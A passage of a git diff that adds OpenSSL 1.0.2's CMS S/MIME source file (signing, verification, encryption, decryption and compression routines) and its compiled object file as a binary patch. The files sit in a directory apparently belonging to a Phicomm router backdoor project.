+        CMSerr(CMS_F_CMS_VERIFY, CMS_R_SIGNER_CERTIFICATE_NOT_FOUND);
+        goto err;
+    }
+
+    /* Attempt to verify all signers certs */
+
+    if (!(flags & CMS_NO_SIGNER_CERT_VERIFY)) {
+        cms_certs = CMS_get1_certs(cms);
+        if (!(flags & CMS_NOCRL))
+            crls = CMS_get1_crls(cms);
+        for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+            si = sk_CMS_SignerInfo_value(sinfos, i);
+            if (!cms_signerinfo_verify_cert(si, store,
+                                            cms_certs, crls, flags))
+                goto err;
+        }
+    }
+
+    /* Attempt to verify all SignerInfo signed attribute signatures */
+
+    if (!(flags & CMS_NO_ATTR_VERIFY)) {
+        for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+            si = sk_CMS_SignerInfo_value(sinfos, i);
+            if (CMS_signed_get_attr_count(si) < 0)
+                continue;
+            if (CMS_SignerInfo_verify(si) <= 0)
+                goto err;
+        }
+    }
+
+    /*
+     * Performance optimization: if the content is a memory BIO then store
+     * its contents in a temporary read only memory BIO. This avoids
+     * potentially large numbers of slow copies of data which will occur when
+     * reading from a read write memory BIO when signatures are calculated.
+     */
+
+    if (dcont && (BIO_method_type(dcont) == BIO_TYPE_MEM)) {
+        char *ptr;
+        long len;
+        len = BIO_get_mem_data(dcont, &ptr);
+        tmpin = BIO_new_mem_buf(ptr, len);
+        if (tmpin == NULL) {
+            CMSerr(CMS_F_CMS_VERIFY, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+    } else
+        tmpin = dcont;
+
+    cmsbio = CMS_dataInit(cms, tmpin);
+    if (!cmsbio)
+        goto err;
+
+    if (!cms_copy_content(out, cmsbio, flags))
+        goto err;
+
+    if (!(flags & CMS_NO_CONTENT_VERIFY)) {
+        for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+            si = sk_CMS_SignerInfo_value(sinfos, i);
+            if (CMS_SignerInfo_verify_content(si, cmsbio) <= 0) {
+                CMSerr(CMS_F_CMS_VERIFY, CMS_R_CONTENT_VERIFY_ERROR);
+                goto err;
+            }
+        }
+    }
+
+    ret = 1;
+
+ err:
+
+    if (dcont && (tmpin == dcont))
+        do_free_upto(cmsbio, dcont);
+    else
+        BIO_free_all(cmsbio);
+
+    if (cms_certs)
+        sk_X509_pop_free(cms_certs, X509_free);
+    if (crls)
+        sk_X509_CRL_pop_free(crls, X509_CRL_free);
+
+    return ret;
+}
+
+int CMS_verify_receipt(CMS_ContentInfo *rcms, CMS_ContentInfo *ocms,
+                       STACK_OF(X509) *certs,
+                       X509_STORE *store, unsigned int flags)
+{
+    int r;
+    flags &= ~(CMS_DETACHED | CMS_TEXT);
+    r = CMS_verify(rcms, certs, store, NULL, NULL, flags);
+    if (r <= 0)
+        return r;
+    return cms_Receipt_verify(rcms, ocms);
+}
+
+CMS_ContentInfo *CMS_sign(X509 *signcert, EVP_PKEY *pkey,
+                          STACK_OF(X509) *certs, BIO *data,
+                          unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    int i;
+
+    cms = CMS_ContentInfo_new();
+    if (!cms || !CMS_SignedData_init(cms))
+        goto merr;
+
+    if (pkey && !CMS_add1_signer(cms, signcert, pkey, NULL, flags)) {
+        CMSerr(CMS_F_CMS_SIGN, CMS_R_ADD_SIGNER_ERROR);
+        goto err;
+    }
+
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        X509 *x = sk_X509_value(certs, i);
+        if (!CMS_add1_cert(cms, x))
+            goto merr;
+    }
+
+    if (!(flags & CMS_DETACHED))
+        CMS_set_detached(cms, 0);
+
+    if ((flags & (CMS_STREAM | CMS_PARTIAL))
+        || CMS_final(cms, data, NULL, flags))
+        return cms;
+    else
+        goto err;
+
+ merr:
+    CMSerr(CMS_F_CMS_SIGN, ERR_R_MALLOC_FAILURE);
+
+ err:
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    return NULL;
+}
+
+CMS_ContentInfo *CMS_sign_receipt(CMS_SignerInfo *si,
+                                  X509 *signcert, EVP_PKEY *pkey,
+                                  STACK_OF(X509) *certs, unsigned int flags)
+{
+    CMS_SignerInfo *rct_si;
+    CMS_ContentInfo *cms = NULL;
+    ASN1_OCTET_STRING **pos, *os;
+    BIO *rct_cont = NULL;
+    int r = 0;
+
+    flags &= ~(CMS_STREAM | CMS_TEXT);
+    /* Not really detached but avoids content being allocated */
+    flags |= CMS_PARTIAL | CMS_BINARY | CMS_DETACHED;
+    if (!pkey || !signcert) {
+        CMSerr(CMS_F_CMS_SIGN_RECEIPT, CMS_R_NO_KEY_OR_CERT);
+        return NULL;
+    }
+
+    /* Initialize signed data */
+
+    cms = CMS_sign(NULL, NULL, certs, NULL, flags);
+    if (!cms)
+        goto err;
+
+    /* Set inner content type to signed receipt */
+    if (!CMS_set1_eContentType(cms, OBJ_nid2obj(NID_id_smime_ct_receipt)))
+        goto err;
+
+    rct_si = CMS_add1_signer(cms, signcert, pkey, NULL, flags);
+    if (!rct_si) {
+        CMSerr(CMS_F_CMS_SIGN_RECEIPT, CMS_R_ADD_SIGNER_ERROR);
+        goto err;
+    }
+
+    os = cms_encode_Receipt(si);
+
+    if (!os)
+        goto err;
+
+    /* Set content to digest */
+    rct_cont = BIO_new_mem_buf(os->data, os->length);
+    if (!rct_cont)
+        goto err;
+
+    /* Add msgSigDigest attribute */
+
+    if (!cms_msgSigDigest_add1(rct_si, si))
+        goto err;
+
+    /* Finalize structure */
+    if (!CMS_final(cms, rct_cont, NULL, flags))
+        goto err;
+
+    /* Set embedded content */
+    pos = CMS_get0_content(cms);
+    *pos = os;
+
+    r = 1;
+
+ err:
+    if (rct_cont)
+        BIO_free(rct_cont);
+    if (r)
+        return cms;
+    CMS_ContentInfo_free(cms);
+    return NULL;
+
+}
+
+CMS_ContentInfo *CMS_encrypt(STACK_OF(X509) *certs, BIO *data,
+                             const EVP_CIPHER *cipher, unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    int i;
+    X509 *recip;
+    cms = CMS_EnvelopedData_create(cipher);
+    if (!cms)
+        goto merr;
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        recip = sk_X509_value(certs, i);
+        if (!CMS_add1_recipient_cert(cms, recip, flags)) {
+            CMSerr(CMS_F_CMS_ENCRYPT, CMS_R_RECIPIENT_ERROR);
+            goto err;
+        }
+    }
+
+    if (!(flags & CMS_DETACHED))
+        CMS_set_detached(cms, 0);
+
+    if ((flags & (CMS_STREAM | CMS_PARTIAL))
+        || CMS_final(cms, data, NULL, flags))
+        return cms;
+    else
+        goto err;
+
+ merr:
+    CMSerr(CMS_F_CMS_ENCRYPT, ERR_R_MALLOC_FAILURE);
+ err:
+    if (cms)
+        CMS_ContentInfo_free(cms);
+    return NULL;
+}
+
+static int cms_kari_set1_pkey(CMS_ContentInfo *cms, CMS_RecipientInfo *ri,
+                              EVP_PKEY *pk, X509 *cert)
+{
+    int i;
+    STACK_OF(CMS_RecipientEncryptedKey) *reks;
+    CMS_RecipientEncryptedKey *rek;
+    reks = CMS_RecipientInfo_kari_get0_reks(ri);
+    if (!cert)
+        return 0;
+    for (i = 0; i < sk_CMS_RecipientEncryptedKey_num(reks); i++) {
+        int rv;
+        rek = sk_CMS_RecipientEncryptedKey_value(reks, i);
+        if (CMS_RecipientEncryptedKey_cert_cmp(rek, cert))
+            continue;
+        CMS_RecipientInfo_kari_set0_pkey(ri, pk);
+        rv = CMS_RecipientInfo_kari_decrypt(cms, ri, rek);
+        CMS_RecipientInfo_kari_set0_pkey(ri, NULL);
+        if (rv > 0)
+            return 1;
+        return -1;
+    }
+    return 0;
+}
+
+int CMS_decrypt_set1_pkey(CMS_ContentInfo *cms, EVP_PKEY *pk, X509 *cert)
+{
+    STACK_OF(CMS_RecipientInfo) *ris;
+    CMS_RecipientInfo *ri;
+    int i, r, ri_type;
+    int debug = 0, match_ri = 0;
+    ris = CMS_get0_RecipientInfos(cms);
+    if (ris)
+        debug = cms->d.envelopedData->encryptedContentInfo->debug;
+    ri_type = cms_pkey_get_ri_type(pk);
+    if (ri_type == CMS_RECIPINFO_NONE) {
+        CMSerr(CMS_F_CMS_DECRYPT_SET1_PKEY,
+               CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        return 0;
+    }
+
+    for (i = 0; i < sk_CMS_RecipientInfo_num(ris); i++) {
+        ri = sk_CMS_RecipientInfo_value(ris, i);
+        if (CMS_RecipientInfo_type(ri) != ri_type)
+            continue;
+        match_ri = 1;
+        if (ri_type == CMS_RECIPINFO_AGREE) {
+            r = cms_kari_set1_pkey(cms, ri, pk, cert);
+            if (r > 0)
+                return 1;
+            if (r < 0)
+                return 0;
+        }
+        /*
+         * If we have a cert try matching RecipientInfo otherwise try them
+         * all.
+         */
+        else if (!cert || !CMS_RecipientInfo_ktri_cert_cmp(ri, cert)) {
+            CMS_RecipientInfo_set0_pkey(ri, pk);
+            r = CMS_RecipientInfo_decrypt(cms, ri);
+            CMS_RecipientInfo_set0_pkey(ri, NULL);
+            if (cert) {
+                /*
+                 * If not debugging clear any error and return success to
+                 * avoid leaking of information useful to MMA
+                 */
+                if (!debug) {
+                    ERR_clear_error();
+                    return 1;
+                }
+                if (r > 0)
+                    return 1;
+                CMSerr(CMS_F_CMS_DECRYPT_SET1_PKEY, CMS_R_DECRYPT_ERROR);
+                return 0;
+            }
+            /*
+             * If no cert and not debugging don't leave loop after first
+             * successful decrypt. Always attempt to decrypt all recipients
+             * to avoid leaking timing of a successful decrypt.
+             */
+            else if (r > 0 && debug)
+                return 1;
+        }
+    }
+    /* If no cert and not debugging always return success */
+    if (match_ri && !cert && !debug) {
+        ERR_clear_error();
+        return 1;
+    }
+
+    CMSerr(CMS_F_CMS_DECRYPT_SET1_PKEY, CMS_R_NO_MATCHING_RECIPIENT);
+    return 0;
+
+}
+
+int CMS_decrypt_set1_key(CMS_ContentInfo *cms,
+                         unsigned char *key, size_t keylen,
+                         unsigned char *id, size_t idlen)
+{
+    STACK_OF(CMS_RecipientInfo) *ris;
+    CMS_RecipientInfo *ri;
+    int i, r;
+    ris = CMS_get0_RecipientInfos(cms);
+    for (i = 0; i < sk_CMS_RecipientInfo_num(ris); i++) {
+        ri = sk_CMS_RecipientInfo_value(ris, i);
+        if (CMS_RecipientInfo_type(ri) != CMS_RECIPINFO_KEK)
+            continue;
+
+        /*
+         * If we have an id try matching RecipientInfo otherwise try them
+         * all.
+         */
+        if (!id || (CMS_RecipientInfo_kekri_id_cmp(ri, id, idlen) == 0)) {
+            CMS_RecipientInfo_set0_key(ri, key, keylen);
+            r = CMS_RecipientInfo_decrypt(cms, ri);
+            CMS_RecipientInfo_set0_key(ri, NULL, 0);
+            if (r > 0)
+                return 1;
+            if (id) {
+                CMSerr(CMS_F_CMS_DECRYPT_SET1_KEY, CMS_R_DECRYPT_ERROR);
+                return 0;
+            }
+            ERR_clear_error();
+        }
+    }
+
+    CMSerr(CMS_F_CMS_DECRYPT_SET1_KEY, CMS_R_NO_MATCHING_RECIPIENT);
+    return 0;
+
+}
+
+int CMS_decrypt_set1_password(CMS_ContentInfo *cms,
+                              unsigned char *pass, ossl_ssize_t passlen)
+{
+    STACK_OF(CMS_RecipientInfo) *ris;
+    CMS_RecipientInfo *ri;
+    int i, r;
+    ris = CMS_get0_RecipientInfos(cms);
+    for (i = 0; i < sk_CMS_RecipientInfo_num(ris); i++) {
+        ri = sk_CMS_RecipientInfo_value(ris, i);
+        if (CMS_RecipientInfo_type(ri) != CMS_RECIPINFO_PASS)
+            continue;
+        CMS_RecipientInfo_set0_password(ri, pass, passlen);
+        r = CMS_RecipientInfo_decrypt(cms, ri);
+        CMS_RecipientInfo_set0_password(ri, NULL, 0);
+        if (r > 0)
+            return 1;
+    }
+
+    CMSerr(CMS_F_CMS_DECRYPT_SET1_PASSWORD, CMS_R_NO_MATCHING_RECIPIENT);
+    return 0;
+
+}
+
+int CMS_decrypt(CMS_ContentInfo *cms, EVP_PKEY *pk, X509 *cert,
+                BIO *dcont, BIO *out, unsigned int flags)
+{
+    int r;
+    BIO *cont;
+    if (OBJ_obj2nid(CMS_get0_type(cms)) != NID_pkcs7_enveloped) {
+        CMSerr(CMS_F_CMS_DECRYPT, CMS_R_TYPE_NOT_ENVELOPED_DATA);
+        return 0;
+    }
+    if (!dcont && !check_content(cms))
+        return 0;
+    if (flags & CMS_DEBUG_DECRYPT)
+        cms->d.envelopedData->encryptedContentInfo->debug = 1;
+    else
+        cms->d.envelopedData->encryptedContentInfo->debug = 0;
+    if (!pk && !cert && !dcont && !out)
+        return 1;
+    if (pk && !CMS_decrypt_set1_pkey(cms, pk, cert))
+        return 0;
+    cont = CMS_dataInit(cms, dcont);
+    if (!cont)
+        return 0;
+    r = cms_copy_content(out, cont, flags);
+    do_free_upto(cont, dcont);
+    return r;
+}
+
+int CMS_final(CMS_ContentInfo *cms, BIO *data, BIO *dcont, unsigned int flags)
+{
+    BIO *cmsbio;
+    int ret = 0;
+    if (!(cmsbio = CMS_dataInit(cms, dcont))) {
+        CMSerr(CMS_F_CMS_FINAL, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+
+    SMIME_crlf_copy(data, cmsbio, flags);
+
+    (void)BIO_flush(cmsbio);
+
+    if (!CMS_dataFinal(cms, cmsbio)) {
+        CMSerr(CMS_F_CMS_FINAL, CMS_R_CMS_DATAFINAL_ERROR);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    do_free_upto(cmsbio, dcont);
+
+    return ret;
+
+}
+
+#ifdef ZLIB
+
+int CMS_uncompress(CMS_ContentInfo *cms, BIO *dcont, BIO *out,
+                   unsigned int flags)
+{
+    BIO *cont;
+    int r;
+    if (OBJ_obj2nid(CMS_get0_type(cms)) != NID_id_smime_ct_compressedData) {
+        CMSerr(CMS_F_CMS_UNCOMPRESS, CMS_R_TYPE_NOT_COMPRESSED_DATA);
+        return 0;
+    }
+
+    if (!dcont && !check_content(cms))
+        return 0;
+
+    cont = CMS_dataInit(cms, dcont);
+    if (!cont)
+        return 0;
+    r = cms_copy_content(out, cont, flags);
+    do_free_upto(cont, dcont);
+    return r;
+}
+
+CMS_ContentInfo *CMS_compress(BIO *in, int comp_nid, unsigned int flags)
+{
+    CMS_ContentInfo *cms;
+    if (comp_nid <= 0)
+        comp_nid = NID_zlib_compression;
+    cms = cms_CompressedData_create(comp_nid);
+    if (!cms)
+        return NULL;
+
+    if (!(flags & CMS_DETACHED))
+        CMS_set_detached(cms, 0);
+
+    if ((flags & CMS_STREAM) || CMS_final(cms, in, NULL, flags))
+        return cms;
+
+    CMS_ContentInfo_free(cms);
+    return NULL;
+}
+
+#else
+
+int CMS_uncompress(CMS_ContentInfo *cms, BIO *dcont, BIO *out,
+                   unsigned int flags)
+{
+    CMSerr(CMS_F_CMS_UNCOMPRESS, CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+    return 0;
+}
+
+CMS_ContentInfo *CMS_compress(BIO *in, int comp_nid, unsigned int flags)
+{
+    CMSerr(CMS_F_CMS_COMPRESS, CMS_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+    return NULL;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_smime.o
new file mode 100644
index 0000000000000000000000000000000000000000..23f71ca41669420370096e918680057e39b92b9d
GIT binary patch
literal 16480
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
